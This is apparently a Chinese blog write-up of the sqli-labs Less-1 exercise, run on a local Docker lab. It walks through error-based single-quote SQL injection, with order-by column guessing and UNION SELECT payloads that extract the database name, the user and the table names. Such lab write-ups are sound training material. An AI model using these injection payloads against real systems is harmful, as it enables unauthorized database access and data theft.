mysql 解表_sqli-labs过关write up记录(Page-1)

sqli-labs靶机搭建

docker部署:

docker pull acgpiano/sqli-labs

docker run -d -p 80:80 acgpiano/sqli-labs

访问127.0.0.1后,点击Setup/reset Database for labs

Less-1 GET - Error based - Single quotes - String

(基于错误的GET单引号字符型注入)

基于报错--猜解SQL语句

访问http://127.0.0.1/Less-1/?id=1'报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

由'1'' LIMIT 0,1猜测SQL语句:

SELECT ... FROM ... WHERE id='1' LIMIT 0,1

//源代码中

SELECT * FROM users WHERE id='$id' LIMIT 0,1

手工注入

0x01 order by猜解表的列数

SELECT * FROM users WHERE id='1' order by 1 -- ' LIMIT 0,1

这个SQL语句的意思是查询users表中id为1的数据并按第一字段排行。当order by后面的数字大于表的列数时就会报错

访问http://127.0.0.1/Less-1/?id=1' order by 3--+页面正常,

访问http://127.0.0.1/Less-1/?id=1' order by 4--+页面异常:

c0bfeaf40f72ae948324d23832562a11.png

所以users这个表有3个字段。

0x02 联合查询获取信息

union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示,即执行联合查询。需要注意在使用 union 查询的时候需要和主查询的列数相同,这就是为什么要先猜解列数。

查看回显位:

2、3处回显

http://127.0.0.1/Less-1/?id=-1' UNION SELECT 1,2,3 --+

fe3bb6ff6ecae084a834e62706c008a3.png

获取数据

version() #MySQL版本

user() #数据库用户名

database() #数据库名

@@datadir #数据库路径

@@version_compile_os #操作系统版本

http://127.0.0.1/Less-1/?id=-1' UNION SELECT 1,database(),user() --+

得到数据库名字security,用户root@localhost

953a24a056569d8bf31e13d3f105fb0a.png

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

得到各表名

cdcd9f353028611565af9f80dadf60df.png

请输入代码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值